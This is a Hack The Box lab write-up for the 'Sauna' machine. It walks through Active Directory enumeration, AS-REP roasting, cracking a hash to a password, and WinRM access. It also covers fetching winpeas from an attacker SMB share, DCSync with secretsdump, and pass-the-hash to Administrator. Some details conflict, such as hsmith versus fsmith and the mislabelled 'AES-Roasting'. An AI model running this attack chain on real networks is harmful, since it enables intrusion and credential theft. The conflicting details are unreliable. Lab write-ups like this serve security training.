Sauna | HTB Writeup
Enumeration
Enumerating Open Ports: rustscan
Rustscsan, just like nmap, can be used to enumerate open ports. Rustscan is quicker than nmap, therefore, it is beneficial for finding the active ports quickly.
$ rustscan -a 10.10.10.175
Open 10.10.10.175:53
Open 10.10.10.175:80
Open 10.10.10.175:88
Open 10.10.10.175:135
Open 10.10.10.175:139
Open 10.10.10.175:389
Open 10.10.10.175:445
Open 10.10.10.175:464
Open 10.10.10.175:593
Open 10.10.10.175:636
Open 10.10.10.175:3268
Open 10.10.10.175:3269
Open 10.10.10.175:5985
Open 10.10.10.175:9389Nmap Scan
Now that we have the list of open ports, we can use an Nmap scan to probe the ports and find the services active on the ports.
$ nmap -p <list-of-open-ports> -sC -sV 10.10.10.175
DNS
Since, port 53 is active, we can try to perform a zone transfer. We can attempt two subdomains, sauna.htb and egotistical-bank.local. The first domain is just based on a hunch while the latter name can be found in the output of the nmap scan.
dig axfr @10.10.10.175 egotistical-bank.local
dig axfr @10.10.10.175 sauna.htbPerforming a zone transfer eventually fails.
RPC | Port 135.
Since, port 135 is open, we can try rpcinfo and rpcclient with a blank username. However, that too fails.
LDAP | Port 88, Port 636
Ports 88 and 636 are active. We can use them to query ldap. Multiple tools allow you to query ldap. Let’s attempt to enumerate the domain using ldapsearch.
From the output, we can note that the domain name is going to be egotistical-bank.local (because : DC=EGOTISTICAL-BANK,DC=LOCAL was returned)
└─$ ldapsearch -x -H ldap://10.10.10.175 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1ldapsearch -x -H ldap://10.10.10.175 -w '' -D '' -b 'DC=egotistical-bank,DC=local'
However, using ldapsearch wasn’t much helpful and couldn’t use it to fetch the list of valid users.
Kerberos
Since, port 88 is also open. We can use command line utilities such as kerbrute to bruteforce the usernames. I’m using the xato-net-10-million-usernames.txt file to bruteforce the usernames.
kerbrute userenum -d egotistical-bank.local --dc 10.10.10.175 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
2025/01/13 19:21:01 > [+] VALID USERNAME: hsmith@egotistical-bank.local
2025/01/13 19:21:47 > [+] VALID USERNAME: Administrator@egotistical-bank.local
2025/01/13 19:24:34 > [+] VALID USERNAME: fsmith@egotistical-bank.localAES-Roasting
If Kerberos pre-authentication is disabled, we can use the enumerated usernames and impacket-GetNPUsers utility to fetch the hashes of users.
From the screenshot below, we can observe that the hash of the hsmith user is returned.
Bruteforce the hash
Save the hash in a hash file. Save the entire hash in a file named hash and execute the following command.
hashcat hashDoing this is beneficial because it tells you which hashcat mode is required to bruteforce the hash.
Crack the hash
Once we know the mode, we can bruteforce the hash using the following command. Note that the mode, 18200 was fetched from the previous command.
$ hashcat hash -m 18200 /usr/share/wordlists/rockyou.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:dc38309ec9ddcbf4790857a919ff9e11$5b6a3b0ad088c3a535271785427a1e2529cf8a0090ad00b45d98f0ec34e3ead8920ca0f36599264145c4f6d1bce324423e798aa4ef60c98e101fc4d2343079d3b2fd920aaef9062c39f0ad9f51e900e24dec01a871ccf31bd9192c02a4d560cda802aa4cc45e8d291a7479e44f7d1b84dc49c9c8189a11a1948106dda145a4d991c1bb41bcbbd2a4b0560bc0ab6940313cde2a6214bd6e62f007e10e2bb569580a6ff6cf8776738268ff4d5ff327cb52d7f8768661ca0f0b18364ad237ab328d57ff111575336d3d4d3a11da6ab623261d0611e56db40d8202070d50e0f0ca64b541db0f994c51cb5967693f77c5eafbe48d4639b0f8a0a33faaeba3d610d0df:Thestrokes23Initial Foothold
Winrm | Port 5985
Now that we have the user credentials, we can use evil-winrm utility to login as the hsmith. We used evil-winrm as the winrm service was active on port 5985.
$ evil-winrm -i egotistical-bank.local -u hsmith -p Thestrokes23
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type users.txt
72703c7efae9f3fcc57fe0c661c997dbPost Exploitation
Once inside, we can upload the winpeas.exe file to enumerate the box. There are multiple ways to upload the file to a windows box from a linux machine. For the sake of learning, I’m going with first creating an smbserver.
Note: Make sure that the directory in which you are executing the impacket-smbserver command contains the winpeas.exe file.
#Attacker machine
impacket-smbserver -smb2support temp .
#victim
*Evil-WinRM* PS C:\Users\FSmith\Documents> net use \\<attacker-ip>\temp
*Evil-WinRM* PS C:\Users\FSmith\Documents> copy \\<attacker-ip>\temp\winpeas.exe winpeas.exe
Once winpeas.exe file is executed, we find the creds for the svc_loanmanager user.
Bloodhound
Further, let’s try bloodhound (detailed info on how to execute it here). If we expand Outbound Object Control for the svc_loanmgr user, we note that we have DCSync permissions.
DCSync
Because of the permission, We can use secretsdump from impacket to dump all the hashes of all the users.
Once we have the hash of the Administrator user, we can use crackmapexec smb utility to check if we can login using the hash. From the response, we note that a Pwn3d! response is returned, which means we can use the hash to login as an Administrator user.
crackmapexec smb <IP> -u 'Administrator' --hash <hash> 
Privilege Escalation
From here, one can take multiple routes. For the sake of learning, we can use psexec to login as an administrator.
impacket-psexec -hashes <hash> -dc-ip <IP> user@IP
